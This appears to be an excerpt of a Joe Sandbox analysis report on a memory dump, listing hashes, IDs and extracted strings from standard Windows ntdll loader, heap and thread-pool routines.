                                          • Opcode ID: 4a96ceee890a5ea39e995890a8c4148580a5a20848975cc68e6a4257a9d51169
                                          • Instruction ID: bb8bd7bd6f0b6b2c583e55a94f4f494db95ecb4fd9dc2b2c5744056b1799897a
                                          • Opcode Fuzzy Hash: 4a96ceee890a5ea39e995890a8c4148580a5a20848975cc68e6a4257a9d51169
                                          • Instruction Fuzzy Hash: D9616732A44B11ABDB22CF18C846B2AB3E1EF80B65F158129FD559B280C774FD44FB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F8106B
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F80FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F810AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F81028
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: c9d90442fbf02225d5d40cfa924865dcb5ca64cc245d5a5b936ae5926db4c49f
                                          • Instruction ID: d3e53ae3d920366898c6935f0deb75c2f8bb07c5ea32ecb94e4a4890232b3e19
                                          • Opcode Fuzzy Hash: c9d90442fbf02225d5d40cfa924865dcb5ca64cc245d5a5b936ae5926db4c49f
                                          • Instruction Fuzzy Hash: 1271E3B19043149FCB20EF14CC86B977FA8EF94764F444468F9498B186D738D589EBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 00F8A998
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F8A9A2
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F8A992
                                          • TG, xrefs: 00F42462
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2078120800
                                          • Opcode ID: b980161405e0211dd7096f20b09bf4cf311088013203d72553e1d282379e62b0
                                          • Instruction ID: b8259f9dab2af43be42b38cbe07b4cb99f570c67143d6d9774f9be1315b44930
                                          • Opcode Fuzzy Hash: b980161405e0211dd7096f20b09bf4cf311088013203d72553e1d282379e62b0
                                          • Instruction Fuzzy Hash: 66314F72A00301EBE734EF58DC45AA9BBB4FB84724F56406AFC406B255C7BD9D41E741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F3327D
                                          • HEAP[%wZ]: , xrefs: 00F33255
                                          • HEAP: , xrefs: 00F33264
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: f65bc2a50180db2cbd902dd62a1d59067313029dcdb63b5a4dfec7c16615df1f
                                          • Instruction ID: 9a45d178877432839145262b13db33e3270c56bbf6b821efc6711584f5ac4006
                                          • Opcode Fuzzy Hash: f65bc2a50180db2cbd902dd62a1d59067313029dcdb63b5a4dfec7c16615df1f
                                          • Instruction Fuzzy Hash: 9692BC71E042489FDB25CF68C840BAEBBF1FF48320F188059E845AB391D739AA45EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 1a99c2c5ba1e3bc5a776072347cb86f99aae961d64d929c22df00ea1a259e70c
                                          • Instruction ID: 77a13c7aeade3bb15235225d9ea9dd4ebf1baa92c42d6e4b6493ad797257159c
                                          • Opcode Fuzzy Hash: 1a99c2c5ba1e3bc5a776072347cb86f99aae961d64d929c22df00ea1a259e70c
                                          • Instruction Fuzzy Hash: 3BF1BF31A00A05DFDB25DF68C894BAAB7B5FF44724F144169E4069B392DB34ED81EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: $@
                                          • API String ID: 2994545307-1077428164
                                          • Opcode ID: 942d05e5efacadfddf1eab25907fb958108ac463580cc79eab25806eb9748e2e
                                          • Instruction ID: 7edc3b796388c5d61e39b95ebee8a89b6e1b0b2f83dd4bdbcf9e585ed1698469
                                          • Opcode Fuzzy Hash: 942d05e5efacadfddf1eab25907fb958108ac463580cc79eab25806eb9748e2e
                                          • Instruction Fuzzy Hash: BBC29F72A0C3419FD725DF24C881BABBBE5AF88754F14892DF989C7241D734D805EBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 7cc35ae1875f1e0b9a079a146b88c97e372d628c1aec0147e48986ab3b1bec1a
                                          • Instruction ID: 395dbeec87a51a115ad99519a6ae303345c26c3cef2294b8d523fd6116c1cfc6
                                          • Opcode Fuzzy Hash: 7cc35ae1875f1e0b9a079a146b88c97e372d628c1aec0147e48986ab3b1bec1a
                                          • Instruction Fuzzy Hash: 49A15971D016299BDB21DF64CC89BEAB7B8EF48710F1041EAE90CA7250D7399E84DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCheckModule, xrefs: 00F8A117
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F8A121
                                          • Failed to allocated memory for shimmed module list, xrefs: 00F8A10F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-161242083
                                          • Opcode ID: d8a8944467fb52f1e66945b67572294bc110376ce12f1118f7337c135b1e3206
                                          • Instruction ID: a65eb3001795851f10e7f449cfb88ce1689cfb61ffdb71b910aa773a0ccab96c
                                          • Opcode Fuzzy Hash: d8a8944467fb52f1e66945b67572294bc110376ce12f1118f7337c135b1e3206
                                          • Instruction Fuzzy Hash: 3471E071E00205DBDB24EF68CC81AAEBBF0FB44714F14416DEA42AB241EA79AD41EB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: f9930c4109509243afbcf77aa21321ca0521b2a4850ad98e3d057ee592f6faeb
                                          • Instruction ID: 9f881bedde9a1920034f789666aa7f264e7593be16519a3cadda3b9736662174
                                          • Opcode Fuzzy Hash: f9930c4109509243afbcf77aa21321ca0521b2a4850ad98e3d057ee592f6faeb
                                          • Instruction Fuzzy Hash: B761F331600705DFDB28DF28C851BAABBE1FF45724F24846AE445CF292CB74E881EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8T$LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                          • API String ID: 0-2621877482
                                          • Opcode ID: 7ba1ba6877e5fe956413edd9107ed5cd7c2f514ae4b50cb4626f65b8f0d11b08
                                          • Instruction ID: 56f752f50949953d9c8c61ed47080bd4d72b8a1200ef17033e649d0d3938e7fe
                                          • Opcode Fuzzy Hash: 7ba1ba6877e5fe956413edd9107ed5cd7c2f514ae4b50cb4626f65b8f0d11b08
                                          • Instruction Fuzzy Hash: 4B61F172E006599FDB11DFA8E840BEDB7B4BF14720F140569E801EB6A0D778D940EB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F1CD34
                                          • InstallLanguageFallback, xrefs: 00F1CD7F
                                          • @, xrefs: 00F1CD63
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 91e0dfcc3878be22b98a9e6e707400ff57d1e37c035c215c8b86f0c83a5ee404
                                          • Instruction ID: f511be7a6e8838b4ade21c70c428f827810b76c9822f32a93c4fab49c39afa7a
                                          • Opcode Fuzzy Hash: 91e0dfcc3878be22b98a9e6e707400ff57d1e37c035c215c8b86f0c83a5ee404
                                          • Instruction Fuzzy Hash: DC51DDB69043459BC710DF24C844BABB7E8AF88724F01492FF988E7250E775DE44A7A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F982E8
                                          • Failed to reallocate the system dirs string !, xrefs: 00F982D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 00F982DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 85328ace17725b01729662e8cbe2be297e1f82617f4a16d8374a2df78da6a7a5
                                          • Instruction ID: 1f8625f30f10030afe6efb317004d9b5362ff2968957ba21804cda5788eaf841
                                          • Opcode Fuzzy Hash: 85328ace17725b01729662e8cbe2be297e1f82617f4a16d8374a2df78da6a7a5
                                          • Instruction Fuzzy Hash: C641D372904300ABD720EB24EC45B5B77E8EB49B60F00492AFE85D7291EB7DD804AB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • PreferredUILanguages, xrefs: 00FDC212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FDC1C5
                                          • @, xrefs: 00FDC1F1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: 741d12326dee7607df377475ffee5a15325905e300ad65a1563daf89978f4dc5
                                          • Instruction ID: 68a71b6ab19ce7ec50d17337e18f55b9a22426ab92f65625f63d19a6cad1c8d7
                                          • Opcode Fuzzy Hash: 741d12326dee7607df377475ffee5a15325905e300ad65a1563daf89978f4dc5
                                          • Instruction Fuzzy Hash: 5A416D72E0021AEBDB11DAD4C881BEEB7BAAB54711F18416BE905B7280D7749E44EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: e8731415da5c1f631af95319b8a89847cba3f5d7c43c7227d338e28b2527ff9b
                                          • Instruction ID: 28a7dcfedc163f5425b5acb313c1037f648870101621be7ea959c2937c3b9f47
                                          • Opcode Fuzzy Hash: e8731415da5c1f631af95319b8a89847cba3f5d7c43c7227d338e28b2527ff9b
                                          • Instruction Fuzzy Hash: FB41E172D046588BEB22DB9ACA40BEDB7B4EF55350F240469E801EB792D638A941FF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCheckRedirection, xrefs: 00FA488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FA4899
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FA4888
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: 1d1ee8e6b7b7b89445da6700f5a174988a8acc7a344b580d16d1618ccfe6573a
                                          • Instruction ID: 9fd748c13fa514e6c76be5093acd7b176dbc6c2528f6c08483c6eb1655829e37
                                          • Opcode Fuzzy Hash: 1d1ee8e6b7b7b89445da6700f5a174988a8acc7a344b580d16d1618ccfe6573a
                                          • Instruction Fuzzy Hash: 1041D3B2A043909FCB21CE18E840A2677E4BFCAB60B150269EC95D7251D3B9FC00EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-405261330
                                          • Opcode ID: 13d873a1519713f4fb376bb6f17c254eab5f031b951a1764ce720980e933a833
                                          • Instruction ID: 1e6094d3adb67d4d9c67df694b4827302b722baa1defb4aab6850eec6e3a3da6
                                          • Opcode Fuzzy Hash: 13d873a1519713f4fb376bb6f17c254eab5f031b951a1764ce720980e933a833
                                          • Instruction Fuzzy Hash: 0141CF31A05669DFDB11DF59D840BAE77B4FF85720F2440A5E800DB292E37AEE00EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 7c23e038662441a049379ced340770dd486ed5c6a781bf3315a91bf3c4ea818c
                                          • Instruction ID: bb2c783be1ca54c014a5cd387ee1648e9aa6cd22247a5fd7ed9794d6b43e7eaa
                                          • Opcode Fuzzy Hash: 7c23e038662441a049379ced340770dd486ed5c6a781bf3315a91bf3c4ea818c
                                          • Instruction Fuzzy Hash: 9111B132315941DFDB28EA14C861BB6F3A5EF90B36F24816AE406CB651DB38DCC1E751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FA2104
                                          • Process initialization failed with status 0x%08lx, xrefs: 00FA20F3
                                          • LdrpInitializationFailure, xrefs: 00FA20FA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: a43e6a28b04dc213edd5d57e1c910856e9278e869353622233e40b51e0bdd442
                                          • Instruction ID: f9a15531d69986b6146ebaa2582c4f577f4a89e17accfd46d618a2c8cd5261fc
                                          • Opcode Fuzzy Hash: a43e6a28b04dc213edd5d57e1c910856e9278e869353622233e40b51e0bdd442
                                          • Instruction Fuzzy Hash: EBF0C875A403086BD734E64CDC47F953768FB42B68F500059F6407B2C1D5B9A940E651
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 07640d799356bb171550d0a3cf48f704bc7552645fff0f1efb88bca699c78016
                                          • Instruction ID: 4b45aa756709f349e706ec3ed76f0258e82dcafc08ddf4338775210506ee6340
                                          • Opcode Fuzzy Hash: 07640d799356bb171550d0a3cf48f704bc7552645fff0f1efb88bca699c78016
                                          • Instruction Fuzzy Hash: 6C714972E0014A9FDB01DFA8D991BAEB7F8AF08714F144065E905E7252EA38EE01DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI$\U
                                          • API String ID: 0-3971960151
                                          • Opcode ID: c549f20feab64eeb0a73309be99de99103476d672dfbfa4d3c6d7752592ee791
                                          • Instruction ID: cb2271159d553c9d7b931a987cd34bb891c73c30dc3c3ddf56aedf1eeac8256c
                                          • Opcode Fuzzy Hash: c549f20feab64eeb0a73309be99de99103476d672dfbfa4d3c6d7752592ee791
                                          • Instruction Fuzzy Hash: 14824C75E002288FDB24CFA9D980BEDB7B5FF48710F248169E859AB291D7349D41EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrResSearchResource Enter, xrefs: 00F2AA13
                                          • LdrResSearchResource Exit, xrefs: 00F2AA25
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: c41194dcc5500336701b79503b532e11f3fdab5ec93475a2964e561acf03a032
                                          • Instruction ID: 69b4fbc18db534c34520a9b9cf8059db36420a439101daa571fbd150b865c8f9
                                          • Opcode Fuzzy Hash: c41194dcc5500336701b79503b532e11f3fdab5ec93475a2964e561acf03a032
                                          • Instruction Fuzzy Hash: 1EE18D72E00228EFEB21DE99DA84BEEB7B9EF54724F104026F901E7251D7389D40EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: 69fefc31693ac547873e39baefbd151a334b94fab9adc81baa5a9d4b6044b579
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 6CC1F2316043819BDB24CF2AC841B2BBBE5FFC4364F184A2DF595CA291D778E905EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 99f01e9f2dff083f04f3e98cba5389583cb45628a6d139ea61407f2bd763c93b
                                          • Instruction ID: 117a61acb6888545a64c075e48a1de6c6c12582752796b3f1734f0bf72b2d6ff
                                          • Opcode Fuzzy Hash: 99f01e9f2dff083f04f3e98cba5389583cb45628a6d139ea61407f2bd763c93b
                                          • Instruction Fuzzy Hash: 48615C72E006189FEF14DFA8C841BADBBB5FB48700F20406DE659EB291D731A944EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: 0bd4494d5f2f84129bfb14a6f600a6d9f85c5a177d8863f20b6b7a5a7d308424
                                          • Instruction ID: 94b02ea5d22d5dd9f906e0cea085d20f971a296fed6b11d3dba07c6503a61dff
                                          • Opcode Fuzzy Hash: 0bd4494d5f2f84129bfb14a6f600a6d9f85c5a177d8863f20b6b7a5a7d308424
                                          • Instruction Fuzzy Hash: 20514971E0061DAFDB11DFA4CD91FEEBBB8EB44754F140529E900B7280D635AE05DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • kLsE, xrefs: 00F20540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F2063D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: 0cde67251c68b0e20fb80dd5e635daf5cf3c1cc5f1a7ee52d1081dba38881943
                                          • Instruction ID: 065b3d3ac177def1737046d728ff563bf5f43f8344d20b0493dc79e45b910195
                                          • Opcode Fuzzy Hash: 0cde67251c68b0e20fb80dd5e635daf5cf3c1cc5f1a7ee52d1081dba38881943
                                          • Instruction Fuzzy Hash: 0F51EF729047568FC724EF64E4456A3BBE4EF84310F04883EE9DA87242EB74E945DF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 933bca28645befb9cbdb3c0905abca93ea870d72362b570dbe2bbde88aa02ea3
                                          • Instruction ID: 366bd8d44582826eaf8cfaaff2cce588c1263e1b333ad3f71a989e92a54b6ae1
                                          • Opcode Fuzzy Hash: 933bca28645befb9cbdb3c0905abca93ea870d72362b570dbe2bbde88aa02ea3
                                          • Instruction Fuzzy Hash: 6401D1B2240B04AFD311DF24CD46B2677E8E784716F058A39BA58C7190E778D818DB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 22281fd7375ad232641cf2f7cb6f75ecc921813f1d223f5ff20b3711a9e11898
                                          • Instruction ID: 1ac8ee77697d48f387ac37ecb627898cb48100dd44e18002fc7167ebebd3e85c
                                          • Opcode Fuzzy Hash: 22281fd7375ad232641cf2f7cb6f75ecc921813f1d223f5ff20b3711a9e11898
                                          • Instruction Fuzzy Hash: 9C9163B2940619AFDB21DF95DD85FAEBBB8EF09B50F140065F600EB291D774AD00DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 234269b2febedb003a2a7d4de908329ff29423d1d7dc83a35490e17a1878cc34
                                          • Instruction ID: d3a699e5fb51bad6326a063d0c3985ad7fb6bd2ed9f089466203853a6954802e
                                          • Opcode Fuzzy Hash: 234269b2febedb003a2a7d4de908329ff29423d1d7dc83a35490e17a1878cc34
                                          • Instruction Fuzzy Hash: CC719F75E0020ADFEF28DF98D991AADBBB1BF48714F24812EE805E7241DB359D41EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          • Opcode ID: 5641dd18176fceec4eea12f912ad28eabee3a2e027b684857b1b6c81931b367f
                                          • Instruction ID: 6f6ab92ed771a25efc8d382e5683c1a574c01f6831e37218d351b43b2b27add5
                                          • Opcode Fuzzy Hash: 5641dd18176fceec4eea12f912ad28eabee3a2e027b684857b1b6c81931b367f
                                          • Instruction Fuzzy Hash: 71518172D0022ADBCF10DF99DA51FAEB7B4AF44B50F05412DE911BB251D738AD01EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
